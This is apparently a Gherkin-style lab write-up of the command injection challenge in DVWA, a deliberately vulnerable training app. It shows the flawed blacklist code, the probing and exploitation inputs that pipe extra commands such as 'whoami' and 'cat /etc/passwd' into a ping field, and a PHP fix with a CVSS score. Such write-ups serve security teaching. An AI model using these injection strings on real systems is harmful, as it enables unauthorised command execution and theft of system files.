## Version 1.4.1
## language: en

Feature:
  TOE:
    dvwa
  Category:
    Command Injection - medium
  Location:
    http://127.0.0.1:2000/vulnerabilities/exec
  CWE:
    CWE-78: Improper Neutralization of Special Elements used in an OS Command
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Get sensitive data by OS command injection
  Recommendation:
    Validate user input before execute any command

  Background:
  Hacker's software:
    | <Software name>   | <Version>       |
    | Ubuntu            | 16.04.6 LTS     |
    | Firefox           | 71.04           |
    | Docker            | 18.06.1-ce      |
  TOE information:
    Given I am using the docker image "vulnerables/web-dvwa"
    And I start a new container
    When I examine the container technologies
    Then I see that the database is "10.1.26-MariaDB"
    And the server is "Apache/2.4.25"
    And the web app was made with "PHP 7.0.30-0"

  Scenario: Normal use case
    Given I get a page that pings a given address
    When I introduce "google.com"
    Then the page shows the ping results
    """
    PING google.com (172.217.172.14): 56 data bytes
    64 bytes from 172.217.172.14: icmp_seq=0 ttl=55 time=31.185 ms
    64 bytes from 172.217.172.14: icmp_seq=1 ttl=55 time=34.536 ms
    64 bytes from 172.217.172.14: icmp_seq=2 ttl=55 time=28.344 ms
    64 bytes from 172.217.172.14: icmp_seq=3 ttl=55 time=20.930 ms
    --- google.com ping statistics ---
    4 packets transmitted, 4 packets received, 0% packet loss
    round-trip min/avg/max/stddev = 20.930/28.749/34.536/5.018 ms
    """

  Scenario: Static detection
    Given I can access to the source code inside the container
    """
    /var/www/html/vulnerabilities/exec/source/medium.php
    """
    When I review the source code
    Then I find a special characters replacement from line 08 to line 14
    """
    08 $substitutions = array(
    09         '&&' => '',
    10         ';'  => '',
    11 );
    12
    13 // Remove any of the charactars in the array (blacklist).
    14 $target = str_replace( array_keys( $substitutions ),
        $substitutions, $target );
    """
    When an attacker tries to get information through OS command injection
    Then the site neutralizes only the most common mechanism
    But the site is still vulnerable to advanced OS command injection

  Scenario: Dynamic detection
  Detecting OS command injection
    Given I get "google.com" ping results
    When I search in the web how to join two command in a single line
    Then I find that the special characters ";", "&&" and "||" are used
    When I try to execute an additional command using these special characters
    """
    google.com ; echo VulnerabilityFound
    google.com && echo VulnerabilityFound
    google.com || echo VulnerabilityFound
    """
    Then I obtain the google ping results again
    When I try another approach using "pipelines" through the character "|"
    """
    google.com | echo VulnerabilityFound
    """
    Then I obtain the expected message [evidence](vulnerabilityfound.png)
    And I find an OS command injection vulnerability

  Scenario: Exploitation
    Given I identify a command injection vulnerability
    When I send the following commands
    """
    google.com | whoami
    google.com | pwd
    google.com | ls -l /
    """
    Then I receive that user is "www-data"
    And current location is "/var/www/html/vulnerabilities/exec"
    And the root folder permissions are
    """
    total 84
    drwxr-xr-x   1 root root 4096 Jan 17 16:31 bin
    drwxr-xr-x   2 root root 4096 Jul 13  2017 boot
    drwxr-xr-x   5 root root  360 Jan 17 16:10 dev
    drwxr-xr-x   1 root root 4096 Jan 17 16:31 etc
    drwxr-xr-x   2 root root 4096 Jul 13  2017 home
    drwxr-xr-x   1 root root 4096 Oct  9  2017 lib
    drwxr-xr-x   1 root root 4096 Oct 12  2018 lib64
    -rwxr-xr-x   1 root root  231 Oct 12  2018 main.sh
    drwxr-xr-x   2 root root 4096 Oct  9  2017 media
    drwxr-xr-x   2 root root 4096 Oct  9  2017 mnt
    drwxr-xr-x   2 root root 4096 Oct  9  2017 opt
    dr-xr-xr-x 289 root root    0 Jan 17 16:10 proc
    drwx------   1 root root 4096 Jan 17 16:31 root
    drwxr-xr-x   1 root root 4096 Oct 12  2018 run
    drwxr-xr-x   1 root root 4096 Oct 12  2018 sbin
    drwxr-xr-x   2 root root 4096 Oct  9  2017 srv
    dr-xr-xr-x  13 root root    0 Jan 17 18:54 sys
    drwxrwxrwt   1 root root 4096 Jan 17 16:31 tmp
    drwxr-xr-x   1 root root 4096 Oct  9  2017 usr
    drwxr-xr-x   1 root root 4096 Oct 12  2018 var
    """
    Given most folders have read permissions
    When I look for sensitive information in "/etc/passwd"
    And use the input "google.com | cat /etc/passwd"
    Then I receive the following response [evidence](sensitiveinformation.png)

  Scenario: Remediation
    Given the site is getting an IP or domain
    And the site is showing the ping results
    When I add line 11 in the special characters array
    """
    08 $substitutions = array(
    09         '&&' => '',
    10         ';'  => '',
    11         '|'  => '',
    12 );
    """
    Then the input "google.com | cat /etc/passwd" does not work
    When I look on the web for another options of command injection
    Then I find a lot of options
    When the server receives an input
    Then the server should validates the input
    Given the input could be IP address or domain
    When the server receives a domain
    Then the server should obtain the IP address before pings it
    When I check the code to add a validation logic
    Then I introduce a flag "validInput" in the beginning of the file
    """
    $target = $_REQUEST[ 'ip' ];
    $validInput = 1;
    """
    And I add a validation logic after line 14 (number before modifications)
    """
    $target = str_replace(array_keys($substitutions),$substitutions,$target);
    $ipaddr = gethostbyname($target);
    if(filter_var($ipaddr, FILTER_VALIDATE_IP) !== false) {
        $target = $ipaddr;
    }
    elseif ($target == $ipaddr){
            $html .= "<pre>Please, enter again a valid domain</pre>";
            $validInput  = 0;
    }
    else{
            $target = $ipaddr;
    }

    if ($validInput == 1){
    ...............Rest of the code that ping IP address......................
    """
    Given the function "gethostbyname" returns an IP address with a domain input
    And It returns the same input when it does not find an IP address
    When the user input is not a valid IP
    Then the server checks if the user input returns an IP address
    When the server checks that user input is a valid domain
    And It receives the IP address
    Then the server executes ping command using as input only the IP address
    And the vulnerability is patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.1/10 (High) - AV:N/AC:L/PR:N/UI:L/S:U/C:H/I:L/A:N
  Temporal: Attributes that measure the exploit's popularity and fiabilty
    6.8/10 (Medium) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    6.8/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2020-01-17
